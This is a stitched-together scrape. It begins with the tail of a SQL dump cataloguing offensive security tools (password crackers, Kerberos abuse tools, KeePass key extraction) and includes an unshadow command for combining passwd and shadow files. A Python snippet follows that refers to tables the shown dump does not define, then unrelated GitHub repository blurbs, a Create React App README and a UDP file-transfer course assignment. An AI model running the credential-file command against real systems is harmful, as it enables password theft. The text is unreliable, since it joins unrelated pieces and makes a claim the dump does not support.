    ('BURP Suite', 'Enum, Exploit', 'A program for manipulating HTTP requests, for enumeration and exploitation', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL),
    ('Metasploit', 'All', 'Powerful swiss-army knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL),
    ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL),
    ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf', 'Sniffing', 'N/A', 'N', NULL),
    ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL),
    ('Hydra', 'Exploit', 'Brute-forcer for website passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL),
    ('Mimikatz', 'Post', 'Used to exploit Kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL),
    ('Impacket', 'Exploit', 'A facilitator of Python-based scripts that uses modules for attacking Windows', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL),
    ('Enum4Linux', 'Enum', 'For enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL),
    ('Rubeus', 'Exploit', 'Used for Kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL),
    ('Kerbrute', 'Enum, Exploit', 'Quickly enumerate and brute-force Active Directory accounts through Kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'),
    ('John the Ripper', 'Exploit', 'A password brute-forcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL),
    ('Hashcat', 'Exploit', 'A password brute-forcer', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL),
    ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL),
    ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL),
    ('Hash-Identifier', 'Utility', '(superseded by Name-That-Hash) A simple Python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL),
    ('Scp', 'Utility', 'For transferring files over an SSH connection', 'man pages on linux', 'Connect', 'N/A', 'N', NULL),
    ('SMBClient', 'Utility', 'Used to connect to SMB file shares; can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL),
    ('PowerShell', 'Utility', 'Powerful command line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL),
    ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL),
    ('Vim', 'Utility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL),
    ('LinPeas', 'Post', 'For enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL),
    ('Nikto', 'Enum', 'For full enumeration of websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL),
    ('Radare2', 'Utility', 'A tool used to reverse-engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL),
    ('Evil-WinRM', 'Exploit', 'Malware equivalent of WinRM, used to exploit Windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL),
    ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security-oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL),
    ('WinPeas', 'Post', 'For full enumeration of a Windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL),
    ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL),
    ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL),
    ('KeeThief', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interaction', 'Windows', 'Y', NULL),
    ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and the SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL),
    ('jSQLInjection', 'Enum', 'Used for gathering SQL database information from a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL),
    ('Hping', 'Enum', 'Ping command on steroids, used for enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL),
    ('Linux Exploit Suggester', 'Post', 'Keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL),
    ('Unix-PrivEsc-Check', 'Post', 'Tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps; written in a single shell script so it is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL),
    ('Dotdotpwn', 'Enum', 'A very flexible, intelligent fuzzer to discover directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL),
    ('Websploit', 'Enum, Exploit', 'Swiss-army knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL),
    ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL),
    ('Name-That-Hash', 'Utility', 'Hash-Identifier with more details, command-line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'),
    ('SMBMap', 'Enum', 'Enumerate shares over a domain', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL),
    ('Redis-Cli', 'Exploit', 'Used for interacting with and exploiting Redis on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL),
    ('Unshadow', 'POST', 'Combines passwd and shadow files into one', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'),
    ('WPScan', 'Enum', 'Looks for vulnerabilities in WordPress sites', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL),
    ('Netcat', 'Utility', 'Used for connecting two computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL),
    ('Linux commands', 'Post', 'Linux commands used for priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL),
    ('CrackMapExec', 'Enum, Exploit', 'Swiss-army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL),
    ('IKE-Scan', 'Enum', 'Used to discover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL),
    ('PSK-Crack', 'Exploit', 'Attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL),
    ('CeWL', 'Enum', 'Spiders a given URL, returning a wordlist intended for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL);
COMMIT TRANSACTION;
PRAGMA foreign_keys = on;
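Since the dump defines three tables (Programs, Commands, Exploits) keyed on tool name, here is a minimal, hypothetical Python sketch of how the cheatsheet might be queried once the dump has been loaded into SQLite; the file name cheatsheet.db is an assumption.

```python
import sqlite3

# Assumes the dump above has been imported, e.g.:
#   sqlite3 cheatsheet.db < hack.sql
conn = sqlite3.connect("cheatsheet.db")

# Look up every stored command for a given tool, joining through the
# Name foreign key that Commands shares with Programs.
rows = conn.execute(
    """
    SELECT c.Description, c.Command
    FROM Commands AS c
    JOIN Programs AS p ON p.Name = c.Name
    WHERE p.Name = ?
    """,
    ("Netcat",),
).fetchall()

for description, command in rows:
    print(f"{description}: {command}")
conn.close()
```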
upbound / Platform Ref AwsAWS Reference Platform for Kubernetes + Data Services, for use as a starting point on upbound.io to build, run, and operate your own internal cloud platform and offer a self-service console and API to your internal teams.
rramatchandran / Big O Performance Java
# big-o-performance

A simple html app to demonstrate performance costs of data structures.

- Clone the project
- Navigate to the root of the project in a terminal or command prompt
- Run 'npm install'
- Run 'npm start'
- Go to the URL specified in the terminal or command prompt to try out the app.

# This app was created from the Create React App NPM. Below are instructions from that project.

Below you will find some information on how to perform common tasks. You can find the most recent version of this guide [here](https://github.com/facebookincubator/create-react-app/blob/master/template/README.md).

## Table of Contents

- [Updating to New Releases](#updating-to-new-releases)
- [Sending Feedback](#sending-feedback)
- [Folder Structure](#folder-structure)
- [Available Scripts](#available-scripts)
- [npm start](#npm-start)
- [npm run build](#npm-run-build)
- [npm run eject](#npm-run-eject)
- [Displaying Lint Output in the Editor](#displaying-lint-output-in-the-editor)
- [Installing a Dependency](#installing-a-dependency)
- [Importing a Component](#importing-a-component)
- [Adding a Stylesheet](#adding-a-stylesheet)
- [Post-Processing CSS](#post-processing-css)
- [Adding Images and Fonts](#adding-images-and-fonts)
- [Adding Bootstrap](#adding-bootstrap)
- [Adding Flow](#adding-flow)
- [Adding Custom Environment Variables](#adding-custom-environment-variables)
- [Integrating with a Node Backend](#integrating-with-a-node-backend)
- [Proxying API Requests in Development](#proxying-api-requests-in-development)
- [Deployment](#deployment)
- [Now](#now)
- [Heroku](#heroku)
- [Surge](#surge)
- [GitHub Pages](#github-pages)
- [Something Missing?](#something-missing)

## Updating to New Releases

Create React App is divided into two packages:

* `create-react-app` is a global command-line utility that you use to create new projects.
* `react-scripts` is a development dependency in the generated projects (including this one).

You almost never need to update `create-react-app` itself: it delegates all the setup to `react-scripts`. When you run `create-react-app`, it always creates the project with the latest version of `react-scripts` so you’ll get all the new features and improvements in newly created apps automatically. To update an existing project to a new version of `react-scripts`, [open the changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md), find the version you’re currently on (check `package.json` in this folder if you’re not sure), and apply the migration instructions for the newer versions. In most cases bumping the `react-scripts` version in `package.json` and running `npm install` in this folder should be enough, but it’s good to consult the [changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md) for potential breaking changes. We commit to keeping the breaking changes minimal so you can upgrade `react-scripts` painlessly.

## Sending Feedback

We are always open to [your feedback](https://github.com/facebookincubator/create-react-app/issues).

## Folder Structure

After creation, your project should look like this:

```
my-app/
  README.md
  index.html
  favicon.ico
  node_modules/
  package.json
  src/
    App.css
    App.js
    index.css
    index.js
    logo.svg
```

For the project to build, **these files must exist with exact filenames**:

* `index.html` is the page template;
* `favicon.ico` is the icon you see in the browser tab;
* `src/index.js` is the JavaScript entry point.
You can delete or rename the other files. You may create subdirectories inside `src`. For faster rebuilds, only files inside `src` are processed by Webpack. You need to **put any JS and CSS files inside `src`**, or Webpack won’t see them. You can, however, create more top-level directories. They will not be included in the production build so you can use them for things like documentation.

## Available Scripts

In the project directory, you can run:

### `npm start`

Runs the app in the development mode.<br>
Open [http://localhost:3000](http://localhost:3000) to view it in the browser.

The page will reload if you make edits.<br>
You will also see any lint errors in the console.

### `npm run build`

Builds the app for production to the `build` folder.<br>
It correctly bundles React in production mode and optimizes the build for the best performance.

The build is minified and the filenames include the hashes.<br>
Your app is ready to be deployed!

### `npm run eject`

**Note: this is a one-way operation. Once you `eject`, you can’t go back!**

If you aren’t satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (Webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you’re on your own.

You don’t have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn’t feel obligated to use this feature. However we understand that this tool wouldn’t be useful if you couldn’t customize it when you are ready for it.

## Displaying Lint Output in the Editor

>Note: this feature is available with `react-scripts@0.2.0` and higher.

Some editors, including Sublime Text, Atom, and Visual Studio Code, provide plugins for ESLint. They are not required for linting. You should see the linter output right in your terminal as well as the browser console. However, if you prefer the lint results to appear right in your editor, there are some extra steps you can do. You would need to install an ESLint plugin for your editor first.

>**A note for Atom `linter-eslint` users**
>If you are using the Atom `linter-eslint` plugin, make sure that **Use global ESLint installation** option is checked:
><img src="http://i.imgur.com/yVNNHJM.png" width="300">

Then make sure `package.json` of your project ends with this block:

```js
{
  // ...
  "eslintConfig": {
    "extends": "./node_modules/react-scripts/config/eslint.js"
  }
}
```

Projects generated with `react-scripts@0.2.0` and higher should already have it. If you don’t need ESLint integration with your editor, you can safely delete those three lines from your `package.json`.

Finally, you will need to install some packages *globally*:

```sh
npm install -g eslint babel-eslint eslint-plugin-react eslint-plugin-import eslint-plugin-jsx-a11y eslint-plugin-flowtype
```

We recognize that this is suboptimal, but it is currently required due to the way we hide the ESLint dependency. The ESLint team is already [working on a solution to this](https://github.com/eslint/eslint/issues/3458) so this may become unnecessary in a couple of months.

## Installing a Dependency

The generated project includes React and ReactDOM as dependencies.
It also includes a set of scripts used by Create React App as a development dependency. You may install other dependencies (for example, React Router) with `npm`: ``` npm install --save <library-name> ``` ## Importing a Component This project setup supports ES6 modules thanks to Babel. While you can still use `require()` and `module.exports`, we encourage you to use [`import` and `export`](http://exploringjs.com/es6/ch_modules.html) instead. For example: ### `Button.js` ```js import React, { Component } from 'react'; class Button extends Component { render() { // ... } } export default Button; // Don’t forget to use export default! ``` ### `DangerButton.js` ```js import React, { Component } from 'react'; import Button from './Button'; // Import a component from another file class DangerButton extends Component { render() { return <Button color="red" />; } } export default DangerButton; ``` Be aware of the [difference between default and named exports](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281). It is a common source of mistakes. We suggest that you stick to using default imports and exports when a module only exports a single thing (for example, a component). That’s what you get when you use `export default Button` and `import Button from './Button'`. Named exports are useful for utility modules that export several functions. A module may have at most one default export and as many named exports as you like. Learn more about ES6 modules: * [When to use the curly braces?](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281) * [Exploring ES6: Modules](http://exploringjs.com/es6/ch_modules.html) * [Understanding ES6: Modules](https://leanpub.com/understandinges6/read#leanpub-auto-encapsulating-code-with-modules) ## Adding a Stylesheet This project setup uses [Webpack](https://webpack.github.io/) for handling all assets. Webpack offers a custom way of “extending” the concept of `import` beyond JavaScript. To express that a JavaScript file depends on a CSS file, you need to **import the CSS from the JavaScript file**: ### `Button.css` ```css .Button { padding: 20px; } ``` ### `Button.js` ```js import React, { Component } from 'react'; import './Button.css'; // Tell Webpack that Button.js uses these styles class Button extends Component { render() { // You can use them as regular CSS styles return <div className="Button" />; } } ``` **This is not required for React** but many people find this feature convenient. You can read about the benefits of this approach [here](https://medium.com/seek-ui-engineering/block-element-modifying-your-javascript-components-d7f99fcab52b). However you should be aware that this makes your code less portable to other build tools and environments than Webpack. In development, expressing dependencies this way allows your styles to be reloaded on the fly as you edit them. In production, all CSS files will be concatenated into a single minified `.css` file in the build output. If you are concerned about using Webpack-specific semantics, you can put all your CSS right into `src/index.css`. It would still be imported from `src/index.js`, but you could always remove that import if you later migrate to a different build tool. ## Post-Processing CSS This project setup minifies your CSS and adds vendor prefixes to it automatically through [Autoprefixer](https://github.com/postcss/autoprefixer) so you don’t need to worry about it. 
For example, this: ```css .App { display: flex; flex-direction: row; align-items: center; } ``` becomes this: ```css .App { display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-orient: horizontal; -webkit-box-direction: normal; -ms-flex-direction: row; flex-direction: row; -webkit-box-align: center; -ms-flex-align: center; align-items: center; } ``` There is currently no support for preprocessors such as Less, or for sharing variables across CSS files. ## Adding Images and Fonts With Webpack, using static assets like images and fonts works similarly to CSS. You can **`import` an image right in a JavaScript module**. This tells Webpack to include that image in the bundle. Unlike CSS imports, importing an image or a font gives you a string value. This value is the final image path you can reference in your code. Here is an example: ```js import React from 'react'; import logo from './logo.png'; // Tell Webpack this JS file uses this image console.log(logo); // /logo.84287d09.png function Header() { // Import result is the URL of your image return <img src={logo} alt="Logo" />; } export default Header; ``` This works in CSS too: ```css .Logo { background-image: url(./logo.png); } ``` Webpack finds all relative module references in CSS (they start with `./`) and replaces them with the final paths from the compiled bundle. If you make a typo or accidentally delete an important file, you will see a compilation error, just like when you import a non-existent JavaScript module. The final filenames in the compiled bundle are generated by Webpack from content hashes. If the file content changes in the future, Webpack will give it a different name in production so you don’t need to worry about long-term caching of assets. Please be advised that this is also a custom feature of Webpack. **It is not required for React** but many people enjoy it (and React Native uses a similar mechanism for images). However, it may not be portable to some other environments, such as Node.js and Browserify. If you prefer to reference static assets in a more traditional way outside the module system, please let us know [in this issue](https://github.com/facebookincubator/create-react-app/issues/28), and we will consider support for this. ## Adding Bootstrap You don’t have to use [React Bootstrap](https://react-bootstrap.github.io) together with React but it is a popular library for integrating Bootstrap with React apps. If you need it, you can integrate it with Create React App by following these steps: Install React Bootstrap and Bootstrap from NPM. React Bootstrap does not include Bootstrap CSS so this needs to be installed as well: ``` npm install react-bootstrap --save npm install bootstrap@3 --save ``` Import Bootstrap CSS and optionally Bootstrap theme CSS in the ```src/index.js``` file: ```js import 'bootstrap/dist/css/bootstrap.css'; import 'bootstrap/dist/css/bootstrap-theme.css'; ``` Import required React Bootstrap components within the ```src/App.js``` file or your custom component files: ```js import { Navbar, Jumbotron, Button } from 'react-bootstrap'; ``` Now you are ready to use the imported React Bootstrap components within your component hierarchy defined in the render method. Here is an example [`App.js`](https://gist.githubusercontent.com/gaearon/85d8c067f6af1e56277c82d19fd4da7b/raw/6158dd991b67284e9fc8d70b9d973efe87659d72/App.js) redone using React Bootstrap.
## Adding Flow Flow typing is currently [not supported out of the box](https://github.com/facebookincubator/create-react-app/issues/72) with the default `.flowconfig` generated by Flow. If you run it, you might get errors like this: ```js node_modules/fbjs/lib/Deferred.js.flow:60 60: Promise.prototype.done.apply(this._promise, arguments); ^^^^ property `done`. Property not found in 495: declare class Promise<+R> { ^ Promise. See lib: /private/tmp/flow/flowlib_34952d31/core.js:495 node_modules/fbjs/lib/shallowEqual.js.flow:29 29: return x !== 0 || 1 / (x: $FlowIssue) === 1 / (y: $FlowIssue); ^^^^^^^^^^ identifier `$FlowIssue`. Could not resolve name src/App.js:3 3: import logo from './logo.svg'; ^^^^^^^^^^^^ ./logo.svg. Required module not found src/App.js:4 4: import './App.css'; ^^^^^^^^^^^ ./App.css. Required module not found src/index.js:5 5: import './index.css'; ^^^^^^^^^^^^^ ./index.css. Required module not found ``` To fix this, change your `.flowconfig` to look like this: ```ini [libs] ./node_modules/fbjs/flow/lib [options] esproposal.class_static_fields=enable esproposal.class_instance_fields=enable module.name_mapper='^\(.*\)\.css$' -> 'react-scripts/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> 'react-scripts/config/flow/file' suppress_type=$FlowIssue suppress_type=$FlowFixMe ``` Re-run flow, and you shouldn’t get any extra issues. If you later `eject`, you’ll need to replace `react-scripts` references with the `<PROJECT_ROOT>` placeholder, for example: ```ini module.name_mapper='^\(.*\)\.css$' -> '<PROJECT_ROOT>/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> '<PROJECT_ROOT>/config/flow/file' ``` We will consider integrating more tightly with Flow in the future so that you don’t have to do this. ## Adding Custom Environment Variables >Note: this feature is available with `react-scripts@0.2.3` and higher. Your project can consume variables declared in your environment as if they were declared locally in your JS files. By default you will have `NODE_ENV` defined for you, and any other environment variables starting with `REACT_APP_`. These environment variables will be defined for you on `process.env`. For example, having an environment variable named `REACT_APP_SECRET_CODE` will be exposed in your JS as `process.env.REACT_APP_SECRET_CODE`, in addition to `process.env.NODE_ENV`. These environment variables can be useful for displaying information conditionally based on where the project is deployed or consuming sensitive data that lives outside of version control. First, you need to have environment variables defined, which can vary between OSes. For example, let's say you wanted to consume a secret defined in the environment inside a `<form>`: ```jsx render() { return ( <div> <small>You are running this application in <b>{process.env.NODE_ENV}</b> mode.</small> <form> <input type="hidden" defaultValue={process.env.REACT_APP_SECRET_CODE} /> </form> </div> ); } ``` The above form is looking for a variable called `REACT_APP_SECRET_CODE` from the environment. In order to consume this value, we need to have it defined in the environment: ### Windows (cmd.exe) ```cmd set REACT_APP_SECRET_CODE=abcdef&&npm start ``` (Note: the lack of whitespace is intentional.) ### Linux, OS X (Bash) ```bash REACT_APP_SECRET_CODE=abcdef npm start ``` > Note: Defining environment variables in this manner is temporary for the life of the shell session. 
Setting permanent environment variables is outside the scope of these docs. With our environment variable defined, we start the app and consume the values. Remember that the `NODE_ENV` variable will be set for you automatically. When you load the app in the browser and inspect the `<input>`, you will see its value set to `abcdef`, and the bold text will show the environment provided when using `npm start`: ```html <div> <small>You are running this application in <b>development</b> mode.</small> <form> <input type="hidden" value="abcdef" /> </form> </div> ``` Having access to the `NODE_ENV` is also useful for performing actions conditionally: ```js if (process.env.NODE_ENV !== 'production') { analytics.disable(); } ``` ## Integrating with a Node Backend Check out [this tutorial](https://www.fullstackreact.com/articles/using-create-react-app-with-a-server/) for instructions on integrating an app with a Node backend running on another port, and using `fetch()` to access it. You can find the companion GitHub repository [here](https://github.com/fullstackreact/food-lookup-demo). ## Proxying API Requests in Development >Note: this feature is available with `react-scripts@0.2.3` and higher. People often serve the front-end React app from the same host and port as their backend implementation. For example, a production setup might look like this after the app is deployed: ``` / - static server returns index.html with React app /todos - static server returns index.html with React app /api/todos - server handles any /api/* requests using the backend implementation ``` Such setup is **not** required. However, if you **do** have a setup like this, it is convenient to write requests like `fetch('/api/todos')` without worrying about redirecting them to another host or port during development. To tell the development server to proxy any unknown requests to your API server in development, add a `proxy` field to your `package.json`, for example: ```js "proxy": "http://localhost:4000", ``` This way, when you `fetch('/api/todos')` in development, the development server will recognize that it’s not a static asset, and will proxy your request to `http://localhost:4000/api/todos` as a fallback. Conveniently, this avoids [CORS issues](http://stackoverflow.com/questions/21854516/understanding-ajax-cors-and-security-considerations) and error messages like this in development: ``` Fetch API cannot load http://localhost:4000/api/todos. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:3000' is therefore not allowed access. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled. ``` Keep in mind that `proxy` only has effect in development (with `npm start`), and it is up to you to ensure that URLs like `/api/todos` point to the right thing in production. You don’t have to use the `/api` prefix. Any unrecognized request will be redirected to the specified `proxy`. Currently the `proxy` option only handles HTTP requests, and it won’t proxy WebSocket connections. If the `proxy` option is **not** flexible enough for you, alternatively you can: * Enable CORS on your server ([here’s how to do it for Express](http://enable-cors.org/server_expressjs.html)). * Use [environment variables](#adding-custom-environment-variables) to inject the right server host and port into your app. ## Deployment By default, Create React App produces a build assuming your app is hosted at the server root. 
To override this, specify the `homepage` in your `package.json`, for example: ```js "homepage": "http://mywebsite.com/relativepath", ``` This will let Create React App correctly infer the root path to use in the generated HTML file. ### Now See [this example](https://github.com/xkawi/create-react-app-now) for a zero-configuration single-command deployment with [now](https://zeit.co/now). ### Heroku Use the [Heroku Buildpack for Create React App](https://github.com/mars/create-react-app-buildpack). You can find instructions in [Deploying React with Zero Configuration](https://blog.heroku.com/deploying-react-with-zero-configuration). ### Surge Install the Surge CLI if you haven't already by running `npm install -g surge`. Run the `surge` command and log in or create a new account. You just need to specify the *build* folder and your custom domain, and you are done. ```sh email: email@domain.com password: ******** project path: /path/to/project/build size: 7 files, 1.8 MB domain: create-react-app.surge.sh upload: [====================] 100%, eta: 0.0s propagate on CDN: [====================] 100% plan: Free users: email@domain.com IP Address: X.X.X.X Success! Project is published and running at create-react-app.surge.sh ``` Note that in order to support routers that use the HTML5 `pushState` API, you may want to rename the `index.html` in your build folder to `200.html` before deploying to Surge. This [ensures that every URL falls back to that file](https://surge.sh/help/adding-a-200-page-for-client-side-routing). ### GitHub Pages >Note: this feature is available with `react-scripts@0.2.0` and higher. Open your `package.json` and add a `homepage` field: ```js "homepage": "http://myusername.github.io/my-app", ``` **The above step is important!** Create React App uses the `homepage` field to determine the root URL in the built HTML file. Now, whenever you run `npm run build`, you will see a cheat sheet with a sequence of commands to deploy to GitHub Pages: ```sh git commit -am "Save local changes" git checkout -B gh-pages git add -f build git commit -am "Rebuild website" git filter-branch -f --prune-empty --subdirectory-filter build git push -f origin gh-pages git checkout - ``` You may copy and paste them, or put them into a custom shell script. You may also customize them for another hosting provider. Note that GitHub Pages doesn't support routers that use the HTML5 `pushState` history API under the hood (for example, React Router using `browserHistory`). This is because when there is a fresh page load for a URL like `http://user.github.io/todomvc/todos/42`, where `/todos/42` is a frontend route, the GitHub Pages server returns 404 because it knows nothing of `/todos/42`. If you want to add a router to a project hosted on GitHub Pages, here are a couple of solutions: * You could switch from using the HTML5 history API to routing with hashes. If you use React Router, you can switch to `hashHistory` for this effect, but the URL will be longer and more verbose (for example, `http://user.github.io/todomvc/#/todos/42?_k=yknaj`). [Read more](https://github.com/reactjs/react-router/blob/master/docs/guides/Histories.md#histories) about different history implementations in React Router. * Alternatively, you can use a trick to teach GitHub Pages to handle 404 by redirecting to your `index.html` page with a special redirect parameter.
You would need to add a `404.html` file with the redirection code to the `build` folder before deploying your project, and you’ll need to add code handling the redirect parameter to `index.html`. You can find a detailed explanation of this technique [in this guide](https://github.com/rafrex/spa-github-pages). ## Something Missing? If you have ideas for more “How To” recipes that should be on this page, [let us know](https://github.com/facebookincubator/create-react-app/issues) or [contribute some!](https://github.com/facebookincubator/create-react-app/edit/master/template/README.md)
syednadeembe / Project SessionsThese sessions will help you implement real-world DevOps projects and act as a focal point of reference.
SOYJUN / FTP Implement Based On UDPThe aim of this assignment is to have you do UDP socket client / server programming with a focus on two broad aspects : Setting up the exchange between the client and server in a secure way despite the lack of a formal connection (as in TCP) between the two, so that ‘outsider’ UDP datagrams (broadcast, multicast, unicast - fortuitously or maliciously) cannot intrude on the communication. Introducing application-layer protocol data-transmission reliability, flow control and congestion control in the client and server using TCP-like ARQ sliding window mechanisms. The second item above is much more of a challenge to implement than the first, though neither is particularly trivial. But they are not tightly interdependent; each can be worked on separately at first and then integrated together at a later stage. Apart from the material in Chapters 8, 14 & 22 (especially Sections 22.5 - 22.7), and the experience you gained from the preceding assignment, you will also need to refer to the following : ioctl function (Chapter 17). get_ifi_info function (Section 17.6, Chapter 17). This function will be used by the server code to discover its node’s network interfaces so that it can bind all its interface IP addresses (see Section 22.6). ‘Race’ conditions (Section 20.5, Chapter 20) You also need a thorough understanding of how the TCP protocol implements reliable data transfer, flow control and congestion control. Chapters 17-24 of TCP/IP Illustrated, Volume 1 by W. Richard Stevens give a good overview of TCP. Though somewhat dated for some things (it was published in 1994), it remains, overall, a good basic reference. Overview This assignment asks you to implement a primitive file transfer protocol for Unix platforms, based on UDP, and with TCP-like reliability added to the transfer operation using timeouts and sliding-window mechanisms, and implementing flow and congestion control. The server is a concurrent server which can handle multiple clients simultaneously. A client gives the server the name of a file. The server forks off a child which reads directly from the file and transfers the contents over to the client using UDP datagrams. The client prints out the file contents as they come in, in order, with nothing missing and with no duplication of content, directly on to stdout (via the receiver sliding window, of course, but with no other intermediate buffering). The file to be transferred can be of arbitrary length, but its contents are always straightforward ASCII text. As an aside, let me mention that assuming ASCII file contents is not as restrictive as it sounds. We can always pretend, for example, that binary files are base64 encoded (“ASCII armor”). A real file transfer protocol would, of course, have to worry about transferring files between heterogeneous platforms with different file structure conventions and semantics. The sender would first have to transform the file into a platform-independent, protocol-defined, format (using, say, ASN.1, or some such standard), and the receiver would have to transform the received file into its platform’s native file format. This kind of thing can be fairly time-consuming, and is certainly very tedious, to implement, with little educational value - it is not part of this assignment. Arguments for the server You should provide the server with an input file server.in from which it reads the following information, in the order shown, one item per line : Well-known port number for server.
